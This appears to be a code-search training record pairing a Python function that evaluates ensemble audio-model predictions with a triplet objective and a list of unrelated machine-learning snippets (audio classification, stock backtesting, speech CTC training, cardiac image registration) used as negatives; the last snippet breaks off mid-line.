def test_wind_mel_model(preds_paths, data_val): # Load model predicitions - allowing for possibility of ensemble model_preds = np.stack([np.load(pred_path) for pred_path in preds_paths]) model_preds = np.mean(model_preds, axis=0) # Get ids and true labels labels = [] ids = [] for example in data_val: labels.append(example[1]) ids.append(example[2]) # Calculate accuracy and label-predication pairs num_examples = 0 num_correct = 0 current_id = None current_label = None c_matrix = np.zeros((50, 50)) for i in range(len(ids)): label = labels[i] id = ids[i] # Check to see if new example has entered if id != current_id: # Evaluate previous id fully - will not enter on first iteration if current_id: current_prediction_probs /= num_ids prediction = np.argmax(current_prediction_probs) # update lab_pred counts c_matrix[int(current_label), int(prediction)] += 1 # Increment correct prediction counter if prediction correct if prediction == current_label: num_correct += 1 # reset and increment variables num_examples += 1 current_id = id current_label = label num_ids = 1 current_prediction_probs = model_preds[i] else: num_ids += 1 current_prediction_probs += model_preds[i] accuracy = num_correct / num_examples print(f"{num_correct} / {num_examples} = {accuracy:.4f}") return accuracy, c_matrix
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_models(directorio=''):\r\n \r\n print('The trained models will be tested now')\r\n start = time.time()\r\n \r\n busqueda = \"ls \" + directorio + \"/*.h5 > model_names.txt\"\r\n\r\n os.system(busqueda)\r\n\r\n X = np.load(directorio + '/Xtest.npy')\r\n diccio = np.load(directorio + '/feature_standarisation.npy').item()\r\n y = pd.read_csv(directorio + '/dbtest.csv')['target'].values\r\n\r\n X = (X - diccio['mean'])/diccio['std']\r\n x = np.reshape(X,(X.shape[0],X.shape[2]))\r\n \r\n with open('model_names.txt','r') as f:\r\n for line in f:\r\n modelo = models.load_model(line[:len(line)-1])\r\n nombre = line.split('/')[1]\r\n outpred = modelo.predict(x)\r\n prediction = outpred >= 0.5\r\n \r\n cost = -(np.dot(y,np.log10(outpred)) + \\\r\n np.dot((1-y),np.log10(1-outpred)))/y.shape[0]\r\n precision,recall,fscore,support = PRFS(y, prediction)\r\n \r\n with open(directorio + '/test_results.txt','a') as tr:\r\n tr.write(nombre + '\\n')\r\n tr.write('cost function: '+str(cost[0])+'\\n')\r\n tr.write('samples: '+str(support)+'\\n')\r\n tr.write('precision: '+str(np.round(precision*100,2))+'\\n')\r\n tr.write('recall: '+str(np.round(recall*100,2))+'\\n')\r\n tr.write('f1-score: '+str(np.round(fscore*100,2))+'\\n')\r\n tr.write('\\n')\r\n tr.close()\r\n \r\n print('The test of all trained models lasted ', round(time.time()-start,2),' s')\r\n os.system('rm model_names.txt')\r\n \r\n return", "def test():\r\n le = preprocessing.LabelEncoder()\r\n le.fit([\"Door Knocking\",\"Shower Running\",\"Toilet Flushing\",\"Vacuum Cleaning\",\"Keyboard Typing\", # encode class labels as numeric id values\r\n \"Coughing\",\"Neutral\"])\r\n \r\n if torch.cuda.is_available():\r\n device = \"cuda:0\"\r\n use_cuda = True\r\n else:\r\n device = \"cpu\"\r\n use_cuda = False\r\n \r\n myModel, start_epoch, train_hist = loadCheckpoint(31, use_cuda)\r\n \r\n #myModel = myModel.double()\r\n myModel = myModel.to(device, dtype=torch.double)\r\n next(myModel.parameters()).device # Check that it is on Cuda\r\n \r\n file_names = []\r\n class_ids = []\r\n max_s = 1\r\n sr = 44100 \r\n for entry in os.scandir(\"test wavs/\"): # for each folder corresponding to a class in dataset\r\n class_id = entry.name # get class numeric id according to label encoder\r\n relative_path = \"test wavs/\"+entry.name # get path location of data sample for loading audio\r\n file_names.append(relative_path) # append to list\r\n class_ids.append(class_id)\r\n\r\n max_s = 1\r\n sr = 44100\r\n X_test = [] \r\n for i in range(len(file_names)):\r\n audio = LoadAudio.load(file_names[i]) # load audio file\r\n audio = LoadAudio.resample(audio, sr) # resample audio\r\n audio = LoadAudio.mono(audio) # make audio stereo\r\n audio = LoadAudio.resize(audio, max_s) # resize audio \r\n sgram = LoadAudio.spectrogram(audio, n_mels=128, n_fft=1024, hop_len=None) # create spectrogram \r\n sgram = LoadAudio.hpssSpectrograms(audio,sgram)\r\n sgram_tensor = torch.tensor(sgram)\r\n X_test.append(sgram_tensor)\r\n\r\n pred = np.array([])\r\n for i in range(len(X_test)):\r\n inputs = X_test[i]\r\n # Normalize the inputs\r\n inputs_m, inputs_s = inputs.mean(), inputs.std()\r\n inputs = (inputs - inputs_m) / inputs_s\r\n inputs = inputs.unsqueeze(0)\r\n inputs = inputs.double()\r\n \r\n # Get predictions\r\n outputs = myModel(inputs)\r\n\r\n # Get the predicted class with the highest score\r\n _, predicted = torch.max(outputs.data, 1)\r\n \r\n pred = np.append(pred, le.inverse_transform(predicted.detach().cpu().numpy()))\r\n \r\n\r\n df = pd.DataFrame(pred, columns=[\"Predicted\"]) # save predictions as a datafram column\r\n df['True'] = class_ids # save true class as a datafram column\r\n print(\"\\nPredicted:\", df)", "def test_model(predictions: np.array, configs: dict, folder_path: str, test_data_index: pd.Index,\n y_test: np.array,\n study_period_data: pd.DataFrame, parent_model_type: str = 'deep_learning', model_type: str = None,\n history=None, index_id='',\n index_name='', study_period_length: int = 0, model=None, period_range: tuple = (0, 0),\n start_date: datetime.date = datetime.date.today(), end_date: datetime.date = datetime.date.today(),\n get_val_score_only=False, weighting_criterion=None, plotting=False, market_logs=False, **kwargs):\n\n if get_val_score_only:\n # In case classifier is part of MixedEnsemble as is being validated\n y_test = y_test[kwargs['model_index']]\n test_data_index = test_data_index[kwargs['model_index']]\n print(f'\\nGetting validation score for {Style.BRIGHT}{Fore.BLUE}{model_type}{Style.RESET_ALL} ...')\n else:\n print(f'\\nTesting {Style.BRIGHT}{Fore.BLUE}{model_type}{Style.RESET_ALL} model on unseen data ...')\n\n # print(f'{Style.BRIGHT}{Fore.MAGENTA}Length of test data: {len(y_test)}{Style.RESET_ALL}')\n\n study_period_data = study_period_data.copy()\n y_test = y_test.copy()\n predictions = predictions.copy()\n\n timer = Timer().start()\n # JOB: Create data frame with true and predicted values\n if isinstance(test_data_index, pd.MultiIndex):\n test_set_comparison = pd.DataFrame({'y_test': y_test.astype('int8').flatten(), 'prediction': predictions},\n index=test_data_index)\n\n else:\n test_set_comparison = pd.DataFrame({'y_test': y_test.astype('int8').flatten(), 'prediction': predictions},\n index=pd.MultiIndex.from_tuples(test_data_index,\n names=['datadate', 'stock_id']))\n\n # JOB: Transform index of study period data to match test_set_comparison index\n study_period_data.index = study_period_data.index.tolist() # Flatten MultiIndex to tuples\n study_period_data.index.name = 'stock_id' # Rename index\n study_period_data.set_index('datadate', append=True, inplace=True)\n\n # JOB: Merge test set with study period data\n test_set_comparison = test_set_comparison.merge(study_period_data, how='left', left_index=True,\n right_on=['datadate', 'stock_id'])\n\n del study_period_data\n\n # JOB: Create normalized predictions (e.g., directional prediction relative to cross-sectional median of predictions)\n test_set_comparison.loc[:, 'norm_prediction'] = test_set_comparison.loc[:, 'prediction'].gt(\n test_set_comparison.groupby('datadate')['prediction'].transform('median')).astype(np.int16)\n\n # JOB: Create cross-sectional ranking\n test_set_comparison.loc[:, 'prediction_rank'] = test_set_comparison.groupby('datadate')['prediction'].rank(\n method='first', ascending=False).astype('int16')\n test_set_comparison.loc[:, 'prediction_percentile'] = test_set_comparison.groupby('datadate')['prediction'].rank(\n pct=True)\n\n test_data_start_date = test_set_comparison.index.get_level_values('datadate').min().date()\n test_data_end_date = test_set_comparison.index.get_level_values('datadate').max().date()\n test_set_n_days = test_set_comparison.index.get_level_values('datadate').unique().size\n test_set_n_constituents = test_set_comparison.index.get_level_values('stock_id').unique().size\n\n cross_section_size = int(round(test_set_comparison.groupby('datadate')['y_test'].count().mean()))\n print(f'Average size of cross sections: {int(cross_section_size)}')\n\n # Define top k values\n top_k_list = [5, 10]\n\n if cross_section_size > 30:\n top_k_list.extend([50, 100, 150, 200, 250])\n\n # JOB: Create empty dataframe for recording top-k accuracies\n top_k_metrics = pd.DataFrame()\n top_k_metrics.index.name = 'k'\n\n t_costs = 0.0005 # Set transaction costs per half-turn\n\n top_10_excess_return_series = None\n top_10_error_series = None\n market_return_series = None\n market_cum_returns = None\n market_metrics = None\n\n if not get_val_score_only:\n market_metrics, market_return_series, market_cum_returns = get_market_metrics(test_set_comparison,\n t_costs=t_costs,\n index_id=index_id,\n index_name=index_name,\n test_data_start_date=test_data_start_date,\n test_data_end_date=test_data_end_date,\n market_logs=market_logs)\n\n for top_k in top_k_list:\n # JOB: Filter test data by top/bottom k affiliation\n long_positions = test_set_comparison[test_set_comparison['prediction_rank'] <= top_k]\n short_positions = test_set_comparison[\n test_set_comparison['prediction_rank'] > test_set_comparison['cs_length'] - top_k]\n short_positions.loc[:, 'daily_return'] = - short_positions.loc[:, 'daily_return']\n\n full_portfolio = pd.concat([long_positions, short_positions], axis=0)\n\n if not get_val_score_only:\n if top_k == 5:\n # Get series of daily portfolio returns\n top_10_excess_return_series = calc_excess_returns(\n full_portfolio.groupby(level=['datadate'])['daily_return'].mean()).rename('daily_excess_return')\n top_10_excess_return_series = top_10_excess_return_series.reset_index()\n top_10_excess_return_series.loc[:, 'datadate'] = top_10_excess_return_series['datadate'].dt.strftime(\n '%Y-%m-%d')\n top_10_excess_return_series.set_index('datadate', inplace=True)\n\n sorted_portfolio = full_portfolio.set_index('prediction_rank', append=True, inplace=False)\n sorted_portfolio.reset_index(['stock_id'], inplace=True)\n sorted_portfolio.sort_index(level=['datadate', 'prediction_rank'], inplace=True)\n sorted_portfolio.reset_index(level='datadate', inplace=True, drop=True)\n top_10_error_series = (sorted_portfolio['norm_prediction'] - sorted_portfolio['y_test']).abs()\n top_10_error_series = top_10_error_series.values.tolist()\n\n cumulative_return = (top_10_excess_return_series.get('daily_excess_return') + 1).cumprod().rename(\n 'Cumulative Portfolio Return')\n cumulative_return.index.name = 'Time'\n\n if plotting:\n # Merge market and portfolio returns\n merged = pd.concat([cumulative_return, market_cum_returns], axis=1, join='outer')\n merged.plot()\n plt.legend(loc='best')\n plt.title(label=model_type)\n plt.show()\n\n annualized_sharpe = calc_sharpe(full_portfolio.loc[:, ['daily_return']].groupby(level=['datadate']).mean(),\n annualize=True)\n annualized_sharpe_atc = calc_sharpe(\n full_portfolio.loc[:, ['daily_return']].groupby(level=['datadate']).mean() - 4 * t_costs,\n annualize=True)\n annualized_sortino = calc_sortino(full_portfolio.loc[:, ['daily_return']].groupby(level=['datadate']).mean(),\n annualize=True)\n annualized_sortino_atc = calc_sortino(\n full_portfolio.loc[:, ['daily_return']].groupby(level=['datadate']).mean() - 4 * t_costs,\n annualize=True)\n\n accuracy = None\n\n # JOB: Calculate accuracy score over all trades\n if parent_model_type == 'deep_learning':\n accuracy = binary_accuracy(full_portfolio['y_test'].values,\n full_portfolio['norm_prediction'].values).numpy()\n\n elif parent_model_type == 'tree_based':\n accuracy = accuracy_score(full_portfolio['y_test'].values,\n full_portfolio['norm_prediction'].values)\n\n elif parent_model_type == 'mixed':\n accuracy = accuracy_score(full_portfolio['y_test'].values,\n full_portfolio['norm_prediction'].values)\n\n mean_daily_return = full_portfolio.groupby(level=['datadate'])['daily_return'].mean().mean()\n\n mean_daily_excess_return = calc_excess_returns(\n full_portfolio.groupby(level=['datadate'])['daily_return'].mean().rename('daily_return')).mean()\n\n mean_daily_short = short_positions.groupby(level=['datadate'])['daily_return'].mean().mean()\n mean_daily_long = long_positions.groupby(level=['datadate'])['daily_return'].mean().mean()\n\n top_k_metrics.loc[top_k, 'Accuracy'] = accuracy\n top_k_metrics.loc[top_k, 'Mean Daily Return'] = mean_daily_return\n top_k_metrics.loc[top_k, 'Annualized Return'] = annualize_metric(mean_daily_return)\n top_k_metrics.loc[top_k, 'Mean Daily Excess Return'] = mean_daily_excess_return\n top_k_metrics.loc[top_k, 'Annualized Excess Return'] = annualize_metric(mean_daily_excess_return)\n top_k_metrics.loc[top_k, 'Annualized Sharpe'] = annualized_sharpe\n top_k_metrics.loc[top_k, 'Annualized Sortino'] = annualized_sortino\n top_k_metrics.loc[top_k, 'Mean Daily Return (Short)'] = mean_daily_short\n top_k_metrics.loc[top_k, 'Mean Daily Return (Long)'] = mean_daily_long\n\n # JOB: Add metrics incl. transaction costs of 5 bps per half-turn\n top_k_metrics.loc[top_k, 'Mean Daily Return_atc'] = mean_daily_return - 4 * t_costs\n top_k_metrics.loc[top_k, 'Annualized Return_atc'] = annualize_metric(mean_daily_return - 4 * t_costs)\n top_k_metrics.loc[top_k, 'Mean Daily Excess Return_atc'] = mean_daily_excess_return - 4 * t_costs\n top_k_metrics.loc[top_k, 'Annualized Excess Return_atc'] = annualize_metric(\n mean_daily_excess_return - 4 * t_costs)\n top_k_metrics.loc[top_k, 'Annualized Sharpe_atc'] = annualized_sharpe_atc\n top_k_metrics.loc[top_k, 'Annualized Sortino_atc'] = annualized_sortino_atc\n top_k_metrics.loc[top_k, 'Mean Daily Return (Short)_atc'] = mean_daily_short - 2 * t_costs\n top_k_metrics.loc[top_k, 'Mean Daily Return (Long)_atc'] = mean_daily_long - 2 * t_costs\n\n if get_val_score_only:\n print(f'{weighting_criterion} score: {round(top_k_metrics.loc[5, weighting_criterion], 4)}')\n return top_k_metrics.loc[5, weighting_criterion]\n\n top_k_metrics = pd.concat([top_k_metrics, market_metrics.to_frame().T], join='outer', verify_integrity=True)\n top_k_metrics.fillna('-', inplace=True)\n\n # JOB: Display top-k metrics\n pretty_print_table(top_k_metrics)\n\n # JOB: Plot accuracies and save figure to file\n if plotting:\n for col in top_k_metrics.columns:\n top_k_metrics[col].plot(kind='line', legend=True, fontsize=14)\n plt.savefig(os.path.join(ROOT_DIR, folder_path, f'top_k_{col.lower()}.png'), dpi=600)\n plt.show()\n\n if parent_model_type == 'deep_learning':\n # JOB: Plot training and validation metrics for LSTM\n try:\n plot_train_val(history, configs['model']['metrics'], store_png=True, folder_path=folder_path)\n except AttributeError as ae:\n print(f'{Fore.RED}{Style.BRIGHT}Plotting failed.{Style.RESET_ALL}')\n # print(ae)\n except UnboundLocalError as ule:\n print(\n f'{Fore.RED}{Back.YELLOW}{Style.BRIGHT}Plotting failed. History has not been created.{Style.RESET_ALL}')\n # print(ule)\n\n # JOB: Evaluate model on full test data\n test_score = None\n if parent_model_type == 'deep_learning':\n test_score = float(binary_accuracy(test_set_comparison['y_test'].values,\n test_set_comparison['norm_prediction'].values).numpy())\n\n print(f'\\nTest score on full test set: {float(np.round(test_score, 4))}')\n\n elif parent_model_type in ['tree_based', 'mixed']:\n test_score = accuracy_score(test_set_comparison['y_test'].values,\n test_set_comparison['norm_prediction'].values)\n print(f'\\nTest score on full test set: {np.round(test_score, 4)}')\n\n # pretty_print_table(\n # pd.DataFrame({'y_test': test_set_comparison['y_test'].values, 'norm_prediction': test_set_comparison[\n # 'norm_prediction'].values}).sample(100)) # TODO: Remove\n\n total_epochs = len(history.history['loss']) if history is not None else None\n\n # JOB: Fill dict for logging\n data_record = {\n 'ID': config.run_id,\n 'Experiment Run End': datetime.datetime.now().isoformat(),\n 'Parent Model Type': parent_model_type,\n 'Model Type': model_type,\n 'Index ID': index_id,\n 'Index Name': index_name,\n 'Study Period ID': config.study_period_id,\n 'Study Period Length': study_period_length,\n 'Period Range': period_range,\n 'Study Period Start Date': start_date.isoformat(),\n 'Study Period End Date': end_date.isoformat(),\n 'Test Set Size': y_test.shape[0],\n 'Days Test Set': test_set_n_days,\n 'Constituent Number': test_set_n_constituents,\n 'Average Cross Section Size': cross_section_size,\n 'Test Set Start Date': test_data_start_date.isoformat(),\n 'Test Set End Date': test_data_end_date.isoformat(),\n 'Total Accuracy': test_score,\n\n 'Top-k Accuracy Scores': top_k_metrics['Accuracy'].to_dict(),\n 'Top-k Mean Daily Return': top_k_metrics['Mean Daily Return'].to_dict(),\n 'Top-k Mean Daily Excess Return': top_k_metrics['Mean Daily Excess Return'].to_dict(),\n 'Top-k Annualized Excess Return': top_k_metrics['Annualized Excess Return'].to_dict(),\n 'Top-k Annualized Return': top_k_metrics['Annualized Return'].to_dict(),\n 'Top-k Annualized Sharpe': top_k_metrics['Annualized Sharpe'].to_dict(),\n 'Top-k Annualized Sortino': top_k_metrics['Annualized Sortino'].to_dict(),\n 'Mean Daily Return (Short)': top_k_metrics['Mean Daily Return (Short)'].to_dict(),\n 'Mean Daily Return (Long)': top_k_metrics['Mean Daily Return (Long)'].to_dict(),\n\n 'Top-k Mean Daily Return_atc': top_k_metrics['Mean Daily Return_atc'].to_dict(),\n 'Top-k Annualized Return_atc': top_k_metrics['Annualized Return_atc'].to_dict(),\n 'Top-k Mean Daily Excess Return_atc': top_k_metrics['Mean Daily Excess Return_atc'].to_dict(),\n 'Top-k Annualized Excess Return_atc': top_k_metrics['Annualized Excess Return_atc'].to_dict(),\n 'Top-k Annualized Sharpe_atc': top_k_metrics['Annualized Sharpe_atc'].to_dict(),\n 'Top-k Annualized Sortino_atc': top_k_metrics['Annualized Sortino_atc'].to_dict(),\n 'Top-k Mean Daily Return (Short)_atc': top_k_metrics['Mean Daily Return (Short)_atc'].to_dict(),\n 'Top-k Mean Daily Return (Long)_atc': top_k_metrics['Mean Daily Return (Long)_atc'].to_dict(),\n\n 'Model Configs': model.get_params(),\n 'Total Epochs': total_epochs,\n\n 'Return Series': top_10_excess_return_series['daily_excess_return'].to_dict(),\n 'Prediction Error': top_10_error_series\n }\n\n # JOB: Write to logs\n write_to_logs(data_record)\n\n print('Done testing on unseen data.')\n timer.stop()\n\n return top_10_error_series", "def main(args):\n dataset = MelSpectrogramDataset(args.dataset_file, args.label_file,\n args.context, None, device, None)\n\n # Split train and test datasets\n train_size = int(0.8 * len(dataset))\n test_size = len(dataset) - train_size\n train_dataset, test_dataset = torch.utils.data.random_split(\n dataset, [train_size, test_size])\n train_loader = torch.utils.data.DataLoader(train_dataset,\n batch_size=args.batch_size,\n shuffle=args.shuffle,\n num_workers=0,\n pin_memory=False)\n validation_loader = torch.utils.data.DataLoader(test_dataset,\n batch_size=args.batch_size,\n shuffle=args.shuffle,\n num_workers=0,\n pin_memory=False)\n\n model = get_model(args.model_name, dataset.vector_length).to(device)\n\n optimizer = getattr(torch.optim, args.optimizer)(model.parameters(),\n lr=args.lr,\n weight_decay=args.wd)\n\n loss_func = F.cross_entropy\n\n training_loss = []\n # Train\n for epoch in tqdm(range(args.num_epochs)):\n\n loss_epoch = []\n\n for input_vector, label in train_loader:\n label = label.to(dtype=torch.long,\n device=device,\n non_blocking=False)\n\n input_vector = input_vector.to(device, non_blocking=False)\n input_vector = input_vector.float()\n\n pred = model(input_vector).transpose(1, 2)\n\n optimizer.zero_grad()\n\n loss = loss_func(pred, label)\n\n loss.backward()\n\n optimizer.step()\n\n loss_epoch.append(loss.item())\n\n print(f\"Loss at epoch {epoch} is {sum(loss_epoch)/len(loss_epoch)}\")\n training_loss.append(sum(loss_epoch) / len(loss_epoch))\n validation_losses = validate(args, model, loss_func, validation_loader)\n\n # Graph training loss\n y_loss = np.array(training_loss)\n x_epochs = np.arange(1, len(y_loss) + 1)\n sns.set()\n loss_plot = sns.lineplot(x=x_epochs, y=y_loss)\n loss_plot.set(xlabel='Epoch', ylabel='Cross Entropy Loss')\n plt.title('Training Loss')\n plt.show()", "def train(self):\r\n self.speaker2index_and_index2speaker()\r\n \"\"\"Initialize history matrix\"\"\"\r\n self.history = np.random.normal(loc=0, scale=0.1, size=(len(self.s2i), config.train.class_history))\r\n \"\"\"\"\"\"\r\n \"\"\"\"\"\"\r\n iterations = 0\r\n \"\"\"Get train/test\"\"\"\r\n if WORDSPLIT:\r\n train, test = self.get_train_test_wordsplit()\r\n elif UTTERANCE_SPLIT:\r\n train, test, val = self.get_train_test_utterance_split()\r\n wordlist = joblib.load('wordlist.pkl')\r\n dictionary = joblib.load('dict.pkl')\r\n phones = joblib.load('phones.pkl')\r\n metadata_help = {'wordlist': wordlist, 'dictionary': dictionary, 'phones': phones}\r\n p2c = utils.phone2class(phones)\r\n c2p = utils.class2phone(phones)\r\n \"\"\"CTC loss\"\"\"\r\n # self.ctc_loss = nn.CTCLoss(blank=p2c[config.data.PAD_token], reduction='mean')\r\n self.ctc_loss = nn.CTCLoss(blank=p2c[config.data.PAD_token], reduction='none')\r\n for epoch in range(config.train.num_epochs):\r\n \"\"\"Make dataloader\"\"\"\r\n train_data = Dataset({'files': train, 'mode': 'train', 'metadata_help': metadata_help})\r\n train_gen = data.DataLoader(train_data, batch_size=config.train.batch_size,\r\n shuffle=True, collate_fn=train_data.collate, drop_last=True)\r\n val_data = Dataset({'files': val, 'mode': 'train', 'metadata_help': metadata_help})\r\n val_gen = data.DataLoader(val_data, batch_size=config.train.batch_size,\r\n shuffle=True, collate_fn=val_data.collate, drop_last=True)\r\n\r\n for batch_number, features in enumerate(train_gen):\r\n spectrograms = features['spectrograms']\r\n phones = features['phones']\r\n input_lengths = features['input_lengths']\r\n target_lengths = features['target_lengths']\r\n metadata = features[\"metadata\"]\r\n batch_speakers = [x['speaker'] for x in metadata]\r\n self.G = self.G.train()\r\n\r\n #ipdb.set_trace()\r\n \"\"\"Make input_lengths and target_lengths torch ints\"\"\"\r\n input_lengths = input_lengths.to(torch.int32)\r\n target_lengths = target_lengths.to(torch.int32)\r\n phones = phones.to(torch.int32)\r\n\r\n outputs = self.G(spectrograms)\r\n\r\n outputs = outputs.permute(1, 0, 2) # swap batch and sequence length dimension for CTC loss\r\n\r\n loss = self.ctc_loss(log_probs=outputs, targets=phones,\r\n input_lengths=input_lengths, target_lengths=target_lengths)\r\n\r\n \"\"\"Update the loss history\"\"\"\r\n self.update_history(loss, batch_speakers)\r\n if epoch >= config.train.regular_epochs:\r\n loss_weights = self.get_loss_weights(batch_speakers, type=types[0])\r\n else:\r\n loss_weights = self.get_loss_weights(batch_speakers, type=types[1])\r\n loss = loss * loss_weights\r\n\r\n # Backward and optimize.\r\n self.reset_grad()\r\n # loss.backward()\r\n loss.sum().backward()\r\n self.g_optimizer.step()\r\n\r\n if iterations % self.log_step == 0:\r\n print(str(iterations) + ', loss: ' + str(loss.sum().item()))\r\n if self.use_tensorboard:\r\n self.logger.scalar_summary('loss', loss.sum().item(), iterations)\r\n\r\n if iterations % self.model_save_step == 0:\r\n \"\"\"Calculate validation loss\"\"\"\r\n val_loss = self.val_loss(val=val_gen, iterations=iterations)\r\n print(str(iterations) + ', val_loss: ' + str(val_loss))\r\n if self.use_tensorboard:\r\n self.logger.scalar_summary('val_loss', val_loss, iterations)\r\n \"\"\"Save model checkpoints.\"\"\"\r\n if iterations % self.model_save_step == 0:\r\n G_path = os.path.join(self.model_save_dir, '{}-G.ckpt'.format(iterations))\r\n torch.save({'model': self.G.state_dict(),\r\n 'optimizer': self.g_optimizer.state_dict()}, G_path)\r\n print('Saved model checkpoints into {}...'.format(self.model_save_dir))\r\n\r\n iterations += 1", "def test(model, dataloader, params, args, val):\n\n # evaluation mode\n model.eval()\n\n # initialise buffers\n dice_lv_buffer = []\n dice_myo_buffer = []\n dice_rv_buffer = []\n\n mcd_lv_buffer = []\n hd_lv_buffer = []\n mcd_myo_buffer = []\n hd_myo_buffer = []\n mcd_rv_buffer = []\n hd_rv_buffer = []\n\n mean_mag_grad_detJ_buffer = []\n negative_detJ_buffer = []\n\n\n with tqdm(total=len(dataloader)) as t:\n # iterate over validation subjects\n for idx, (image_ed_batch, image_es_batch, label_ed_batch, label_es_batch) in enumerate(dataloader):\n # (data all in shape of (c, N, H, W))\n\n # extend to (N, c, H, W)\n image_ed_batch = image_ed_batch.permute(1, 0, 2, 3).to(device=args.device)\n image_es_batch = image_es_batch.permute(1, 0, 2, 3).to(device=args.device)\n label_es_batch = label_es_batch.permute(1, 0, 2, 3).to(device=args.device)\n\n with torch.no_grad():\n # compute optical flow and warped ED images towards ES\n dvf = model(image_ed_batch, image_es_batch)\n\n # transform label mask of ES frame\n warped_label_es_batch = resample_transform(label_es_batch.float(), dvf, interp='nearest')\n\n\n \"\"\" Move data to device \"\"\"\n if args.cuda:\n # move data to cpu to calculate metrics\n # (the axis permutation is to comply with metric calculation code which takes input shape H, W, N)\n warped_label_es_batch = warped_label_es_batch.squeeze(1).cpu().numpy().transpose(1, 2, 0)\n label_ed_batch = label_ed_batch.squeeze(0).numpy().transpose(1, 2, 0)\n dvf = dvf.data.cpu().numpy().transpose(0, 2, 3, 1) # (N, H, W, 2)\n else:\n # CPU version of the code\n warped_label_es_batch = warped_label_es_batch.squeeze(1).numpy().transpose(1, 2, 0)\n label_ed_batch = label_ed_batch.squeeze(0).numpy().transpose(1, 2, 0)\n dvf = dvf.data.numpy().transpose(0, 2, 3, 1) # (N, H, W, 2)\n \"\"\"\"\"\"\n\n \"\"\" Calculate the metrics (only works with SAX images) \"\"\"\n # (optional) extract 3 slices (apical, mid-ventricle and basal)\n if not args.all_slices:\n num_slices = label_ed_batch.shape[-1]\n apical_idx = int(round((num_slices - 1) * 0.75)) # 75% from basal\n mid_ven_idx = int(round((num_slices - 1) * 0.5)) # 50% from basal\n basal_idx = int(round((num_slices - 1) * 0.25)) # 25% from basal\n slices_idx = [apical_idx, mid_ven_idx, basal_idx]\n\n warped_label_es_batch = warped_label_es_batch[:, :, slices_idx]\n label_ed_batch = label_ed_batch[:, :, slices_idx]\n dvf = dvf[slices_idx, :, :, :] # needed for detJac\n\n # dice\n dice_lv = categorical_dice_stack(warped_label_es_batch, label_ed_batch, label_class=1)\n dice_myo = categorical_dice_stack(warped_label_es_batch, label_ed_batch, label_class=2)\n dice_rv = categorical_dice_stack(warped_label_es_batch, label_ed_batch, label_class=3)\n\n dice_lv_buffer += [dice_lv]\n dice_myo_buffer += [dice_myo]\n dice_rv_buffer += [dice_rv]\n\n # contour distances\n mcd_lv, hd_lv = contour_distances_stack(warped_label_es_batch, label_ed_batch, label_class=1, dx=params.pixel_size)\n mcd_myo, hd_myo = contour_distances_stack(warped_label_es_batch, label_ed_batch, label_class=2, dx=params.pixel_size)\n mcd_rv, hd_rv = contour_distances_stack(warped_label_es_batch, label_ed_batch, label_class=3, dx=params.pixel_size)\n\n # determinant of Jacobian\n mean_grad_detJ, mean_negative_detJ = detJac_stack(dvf)\n\n\n # update buffers\n mcd_lv_buffer += [mcd_lv]\n hd_lv_buffer += [hd_lv]\n mcd_myo_buffer += [mcd_myo]\n hd_myo_buffer += [hd_myo]\n mcd_rv_buffer += [mcd_rv]\n hd_rv_buffer += [hd_rv]\n\n mean_mag_grad_detJ_buffer += [mean_grad_detJ]\n negative_detJ_buffer += [mean_negative_detJ]\n\n t.update()\n\n # construct metrics dict\n metrics = {'dice_lv_mean': np.mean(dice_lv_buffer), 'dice_lv_std': np.std(dice_lv_buffer),\n 'dice_myo_mean': np.mean(dice_myo_buffer), 'dice_myo_std': np.std(dice_myo_buffer),\n 'dice_rv_mean': np.mean(dice_rv_buffer), 'dice_rv_std': np.std(dice_rv_buffer),\n\n 'mcd_lv_mean': np.mean(mcd_lv_buffer), 'mcd_lv_std': np.std(mcd_lv_buffer),\n 'mcd_myo_mean': np.mean(mcd_myo_buffer), 'mcd_myo_std': np.std(mcd_myo_buffer),\n 'mcd_rv_mean': np.mean(mcd_rv_buffer), 'mcd_rv_std': np.std(mcd_rv_buffer),\n\n 'hd_lv_mean': np.mean(hd_lv_buffer), 'hd_lv_std': np.std(hd_lv_buffer),\n 'hd_myo_mean': np.mean(hd_myo_buffer), 'hd_myo_std': np.std(hd_myo_buffer),\n 'hd_rv_mean': np.mean(hd_rv_buffer), 'hd_rv_std': np.std(hd_rv_buffer),\n\n 'mean_mag_grad_detJ_mean': np.mean(mean_mag_grad_detJ_buffer),\n 'mean_mag_grad_detJ_std': np.std(mean_mag_grad_detJ_buffer),\n\n 'negative_detJ_mean': np.mean(negative_detJ_buffer),\n 'negative_detJ_std': np.std(negative_detJ_buffer)\n }\n\n\n if not val:\n # testing only: save all metrics evaluated for all test subjects in pandas dataframe\n test_result_dir = os.path.join(args.model_dir, \"test_results\")\n if not os.path.exists(test_result_dir):\n os.makedirs(test_result_dir)\n\n # save metrics results mean & std\n xutils.save_dict_to_json(metrics,\n f\"{test_result_dir}/test_results_3slices_{not args.all_slices}.json\")\n\n # save accuracy metrics of every subject\n subj_id_buffer = dataloader.dataset.dir_list\n df_buffer = []\n column_method = ['DL'] * len(subj_id_buffer)\n for struct in ['LV', 'MYO', 'RV']:\n if struct == 'LV':\n ls_dice = dice_lv_buffer\n ls_mcd = mcd_lv_buffer\n ls_hd = hd_lv_buffer\n elif struct == 'MYO':\n ls_dice = dice_myo_buffer\n ls_mcd = mcd_myo_buffer\n ls_hd = hd_myo_buffer\n elif struct == 'RV':\n ls_dice = dice_rv_buffer\n ls_mcd = mcd_rv_buffer\n ls_hd = hd_rv_buffer\n\n ls_struct = [struct] * len(subj_id_buffer)\n data = {'Method': column_method,\n 'ID': subj_id_buffer,\n 'Structure': ls_struct,\n 'Dice': ls_dice,\n 'MCD': ls_mcd,\n 'HD': ls_hd}\n df_buffer += [pd.DataFrame(data=data)]\n # concatenate df and save\n metrics_df = pd.concat(df_buffer, axis=0)\n metrics_df.to_pickle(f\"{test_result_dir}/test_accuracy_results_3slices_{not args.all_slices}.pkl\")\n\n # save detJac metrics for every subject\n jac_data = {'Method': column_method,\n 'ID': subj_id_buffer,\n 'GradDetJac': mean_mag_grad_detJ_buffer,\n 'NegDetJac': negative_detJ_buffer}\n jac_df = pd.DataFrame(data=jac_data)\n jac_df.to_pickle(f\"{test_result_dir}/test_Jacobian_results_3slices{not args.all_slices}.pkl\")\n\n return metrics", "def setup(cls):\n cls.logger = logging.getLogger('ModelTestLogger')\n cls.logger.setLevel(logging.DEBUG)\n\n s1 = model.Subject('subject1')\n s2 = model.Subject('subject2')\n\n cls.experiment = model.Experiment()\n cls.experiment.put_subject(s1)\n cls.experiment.put_subject(s2)\n\n setup1 = model.Setup(cls.experiment)\n modality1 = 